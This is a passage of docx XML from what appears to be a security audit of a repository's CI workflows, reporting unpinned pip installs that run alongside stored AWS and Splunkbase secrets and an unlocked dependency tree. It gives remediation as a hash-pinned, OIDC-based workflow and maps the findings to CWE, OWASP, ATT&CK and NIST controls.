          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>charset-normalizer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>idna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>certifi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) therefore yields: exfiltration of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AWS_ACCESS_KEY_ID/SECRET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SPLUNK_BASE_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the ability to replace TA tarballs (which contain Python modular inputs that execute inside Splunk) for everyone downstream. The same anti-pattern exists in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>build-response-templates.yml:22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip install pyyaml jsonschema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml-validation.yml:47</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip install yamllint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), but those jobs hold only the default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so impact is lower. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>update_nist_ai_rmf_detection_map.yml:31</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> correctly pins </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PyYAML==6.0.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but without a hash. The job also runs on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Python 3.10, which reached end-of-life on 2026-10-01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (endoflife.date, verified) - five days before this review. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = PyPI release stream of 5 top-level packages (+ ~10 transitives) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip3 install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on runner with secrets in env -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>boto3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> client writes to S3 -&gt; all consumers of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Who controls: third-party maintainers / PyPI account takeover; typosquats are not a factor (names are correct) but version-floating is. Preconditions: upstream compromise. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - highest blast radius of any SCA issue in this repo. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t>: Resolution is non-deterministic by design; demonstrated by comparing today's PyPI latest (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>boto3 1.43.108</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2026-10-02, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requests 2.34.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>urllib3 2.8.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>xmltodict 1.0.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PyYAML 6.0.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) against what the workflow would have installed on 2026-01-01 (different versions) - nothing in the repo records which set ran. Reproduction of the control gap: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -n "pip3 install" .github/workflows/update_splunk_tas.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; line 31, no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--require-hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no lockfile. Execution path: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>actions/setup-python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip3 install ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (arbitrary wheel/sdist code) -&gt; process already has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AWS_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> env (step 23 ran first) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ta_update.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>s3_client.upload_file(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (l.490). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: move credentials *after* installation, pin with hashes, use OIDC instead of static keys, and run on a supported Python.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .github/workflows/update_splunk_tas.yml (fixed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name: Splunk TA Update Apps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>on:</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workflow_dispatch:</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schedule:</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 cron: '55 06 * * *'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>permissions:</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contents: read</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id-token: write          # OIDC federation to AWS, no long-lived keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>jobs:</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modify-code:</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runs-on: ubuntu-latest</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steps:</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 uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1   # v7.0.1</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with:</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ref: develop</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persist-credentials: false</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 uses: actions/setup-python@ece7cb06caefa5fff74198d8649806c4678c61a1 # v6</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with:</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python-version: '3.13'          # supported until 2029-10-31</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 name: Install pinned, hash-verified dependencies</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run: |</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python -m pip install --require-hashes --no-deps -r .github/workflows/requirements-ta-update.txt</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 credentials are only introduced AFTER untrusted package code has run</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 uses: aws-actions/configure-aws-credentials@e1253824e5c10ff9df46874f81ed3ec929e19cfd # v6</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with:</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role-to-assume: arn:aws:iam::&lt;account&gt;:role/security-content-ta-uploader</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aws-region: eu-central-1</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 name: Run Python Splunk TA checker</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env:</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SPLUNK_BASE_USERNAME: ${{ secrets.SPLUNK_BASE_USERNAME }}</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SPLUNK_BASE_PASSWORD: ${{ secrets.SPLUNK_BASE_PASSWORD }}</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run: python .github/workflows/ta_update.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># .github/workflows/requirements-ta-update.in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>boto3==1.43.108</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PyYAML==6.0.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>xmltodict==1.0.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>requests==2.34.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>urllib3==2.8.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>#   pip-compile --generate-hashes -o requirements-ta-update.txt requirements-ta-update.in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Why it works: hash verification blocks substituted artifacts; moving </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>configure-aws-credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> below the install step means a compromised package cannot read AWS keys at install time; OIDC role credentials are short-lived and scoped (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>s3:PutObject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on one bucket) so even a runtime compromise cannot persist. Functionality is unchanged (same packages, same script). Also apply the pin/hash pattern to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>build-response-templates.yml:22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml-validation.yml:47</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>update_nist_ai_rmf_detection_map.yml:31</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-1395 Dependency on Vulnerable Third-Party Component; CWE-494 Download of Code Without Integrity Check; CWE-829 Inclusion of Functionality from Untrusted Control Sphere; CWE-522. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A08:2021 Software and Data Integrity Failures, A06:2021 Vulnerable and Outdated Components, A02:2021 Cryptographic Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools, T1552.001 Unsecured Credentials: Credentials In Files, T1565.001 Data Manipulation: Stored Data Manipulation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SR-3 Supply Chain Controls and Processes, SR-4 Provenance, SA-22 Unsupported System Components, SI-2 Flaw Remediation, CM-8 System Component Inventory, IA-5(7) Authenticator Management | No Embedded Unencrypted Static Authenticators, AC-6 Least Privilege. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GV.SC Govern - Cybersecurity Supply Chain Risk Management, PR.AA Protect - Identity Management, Authentication, and Access Control, PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.21 Managing information security in the ICT supply chain, A.8.8 Management of technical vulnerabilities, A.8.19 Installation of software on operational systems, A.5.17 Authentication information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-01 — Build toolchain dependency tree unlocked: 65 transitive packages float with no lockfile or hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.8). Exploitability: Conditionally exploitable (upstream compromise).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requirements.txt:1; .github/workflows/appinspect.yml:28; .github/workflows/build.yml:32; .github/workflows/datasource-dependabot.yml:28; .github/workflows/unit-testing.yml:42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Build toolchain dependency tree is unlocked - 65 transitive packages float on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> constraints with no lockfile or hashes</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1</w:t>
        <w:tab/>
        <w:t>contentctl-ng==1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The repository pins exactly one package. contentctl-ng itself declares 18 direct dependencies with only lower bounds and no upper bounds, so every CI run and every developer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resolves a fresh, un-reviewed set of 65 packages (verified: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uv pip tree</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). There is no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requirements.lock</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip-compile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> output, no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--require-hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.github/dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not watch the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ecosystem, so nobody is notified when a transitive dependency publishes a vulnerable or malicious release. The resolution I obtained today is clean (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip-audit --strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: "No known vulnerabilities found", 64 dependencies), but that is an accident of timing, not a property of the configuration. Because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is free to select any version satisfying the bounds, an environment with an older index mirror or a constraint from another tool can legally end up on the minimum versions - which carry 37 published advisories, including 25 CVEs in GitPython 3.1.49 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CVE-2026-67325</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AV:N/AC:L/PR:L C:H/I:H/A:H, fix 3.1.51; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CVE-2026-87817</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AV:N/AC:L/PR:N/UI:R C:H/I:H/A:H, fix 3.1.60), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CVE-2026-25645</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in requests 2.32.5 (fix 2.33.0) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CVE-2026-58203</w:t>
      </w:r>
      <w:r>
